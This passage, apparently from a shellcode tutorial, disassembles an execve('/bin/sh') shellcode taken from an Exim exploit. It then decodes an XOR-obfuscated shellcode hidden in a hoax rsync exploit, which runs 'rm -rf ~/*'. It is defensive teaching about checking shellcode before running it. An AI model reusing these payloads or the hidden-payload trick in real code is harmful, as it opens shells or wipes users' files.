6. Shellcode analysis

One last point that deserves attention is the importance of disassembling shellcodes, both to learn new techniques and to be sure about what they do before executing them.

6.1 Trust is good...

For instance, let's take a look at the shellcode from the exploit, made available by Rafael San Miguel Carrasco, exploiting a local buffer overflow vulnerability of the Exim MTA (releases 4.40 through 4.43).

static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";

Let's disassemble it with ndisasm; by now, we expect to see something familiar:

$ echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"\
> "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"\
> "\x2f\x73\x68\x58" | ndisasm -u -
00000000  EB17              jmp short 0x19         ; Initial jump to the CALL
00000002  5E                pop esi                ; Store the address of the string in ESI
00000003  897608            mov [esi+0x8],esi      ; Write the address of the string in ESI + 8
00000006  31C0              xor eax,eax            ; Zero out EAX
00000008  884607            mov [esi+0x7],al       ; Null-terminate the string
0000000B  89460C            mov [esi+0xc],eax      ; Write the null pointer to ESI + 12
0000000E  B00B              mov al,0xb             ; Number of the execve(2) syscall
00000010  89F3              mov ebx,esi            ; Store the address of the string in EBX (first argument)
00000012  8D4E08            lea ecx,[esi+0x8]      ; Second argument (pointer to the array)
00000015  31D2              xor edx,edx            ; Zero out EDX (third argument)
00000017  CD80              int 0x80               ; Execute the syscall
00000019  E8E4FFFFFF        call 0x2               ; Push the address of the string and jump to the second
                                                   ;   instruction
0000001E  2F                das                    ; "/bin/shX"
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022  2F                das
00000023  7368              jnc 0x8d
00000025  58                pop eax
$

6.2 ...but control is better

It's always a good habit to examine a shellcode before executing it. For example, on the 28 May 2004, a prankster posted on full-disclosure what he asserted was a public exploit for a rsync vulnerability. However, the code was weird: after a first, well-commented shellcode, there was a second, less visible shellcode:

[...]
char shellcode2[] =
  "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
  "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
  "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
  "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
  "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
  "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
  "\x7b\x35";
[...]

On top of that, after a brief look at the main() of the exploit, it was easy to spot that the latter shellcode was executed locally:

(long) funct = &shellcode2;
[...]
funct();

Therefore, if we want to know what the shellcode actually does, we can do nothing but disassemble it:

$ echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8[...]" | ndisasm -u -
00000000  EB10              jmp short 0x12   ; Jum to the CALL
00000002  5E                pop esi          ; Retrieve the address of byte 0x17
00000003  31C9              xor ecx,ecx      ; Zero out ECX
00000005  B14B              mov cl,0x4b      ; Setup the loop counter (see insctruction 0x0E)
00000007  B0FF              mov al,0xff      ; Setup the XOR mask
00000009  3006              xor [esi],al     ; XOR byte 0x17 with AL
0000000B  FEC8              dec al           ; Decrease the XOR mask
0000000D  46                inc esi          ; Load the address of the next byte
0000000E  E2F9              loop 0x9         ; Keep XORing until ECX=0
00000010  EB05              jmp short 0x17   ; Jump to the first XORed instruction
00000012  E8EBFFFFFF        call 0x2         ; PUSH the address of the next byte and jump to the second instruction
00000017  17                pop ss
[...]

As you can see, it's a self-modifying shellcode: instructions from 0x17 to 0x17 + 0x4B are decoded at run-time by XORing them with the value of AL (which is initially 0xFF and then decreases at each loop iteration). Once decoded, instructions are executed (jmp short 0x17). So let's try to understand which instructions will actually be executed. We can easily decode the shellcode using our beloved python:

decode.py
#!/usr/bin/env python

sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
     "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
     "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
     "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
     "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
     "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
     "\x7b\x35"

print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])

hexdump can already give us a first idea:

$ ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00  |è%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e  |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d  |/dev/null.]1ÀP.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S.ë.á1Ó|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80                 |°.Í..Ã1À@Í.|
0000004c

Mmmh... "/bin/sh", "sh -c rm -rf ~/* 2>/dev/null"... This doesn't look good... But let's disassemble it to be sure!

$ ./decode.py | ndisasm -u -
00000000  E825000000        call 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [0x6d720063],ch
00000015  202D7266207E      and [0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  323E              xor bh,[esi]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029  005D31            add [ebp+0x31],bl
[...]

The first instruction is a CALL, immediately followed by the strings displayed by hexdump. The beginning of the shellcode could be re-written this way:

E825000000                                      call 0x2a
2F62696E2F736800                                db   "/bin/sh"
736800                                          db   "sh"
2D6300                                          db   "-c"
726d202D7266207E2F2A20323E2F6465762F6E756C6C00  db   "rm -rf ~/* 2>/dev/null"
5D                                              pop ebp
[...]

Let's examine the called function, keeping only the opcodes starting at the instruction 0x2a (42):

$ ./decode_exp.py | cut -c 43- | ndisasm -u -
00000000  5D                pop ebp              ; Retrieve the address of the string "/bin/sh"
00000001  31C0              xor eax,eax          ; Zero out EAX
00000003  50                push eax             ; Push the null pointer onto the stack
00000004  8D5D0E            lea ebx,[ebp+0xe]    ; Store the address of "rm -rf ~/* 2>/dev/null" in EBX
00000007  53                push ebx             ;   and push it on the stack
00000008  8D5D0B            lea ebx,[ebp+0xb]    ; Store the address of "-c" in EBX
0000000B  53                push ebx             ;   and push it on the stack
0000000C  8D5D08            lea ebx,[ebp+0x8]    ; Store the address of "sh" in EBX
0000000F  53                push ebx             ;   and push it on the stack
00000010  89EB              mov ebx,ebp          ; Store the address of "/bin/sh" in EBX (first arg to execve())
00000012  89E1              mov ecx,esp          ; Store the stack pointer to ECX (ESP points to"sh", "-c", "rm...")
00000014  31D2              xor edx,edx          ; Third arg to execve()
00000016  B00B              mov al,0xb           ; Number of the execve() syscall
00000018  CD80              int 0x80             ; Execute the syscall
0000001A  89C3              mov ebx,eax          ; Store 0xb in EBX (exit code=11)
0000001C  31C0              xor eax,eax          ; Zero out EAX
0000001E  40                inc eax              ; EAX=1 (number of the exit() syscall)
0000001F  CD80              int 0x80             ; Execute the syscall

As you can see, it's an execve(2) syscall with the array "sh", "-c", "rm -rf ~/* 2>/dev/null" as the second argument. Needless to repeat that you should always analyse a shellcode before executing it!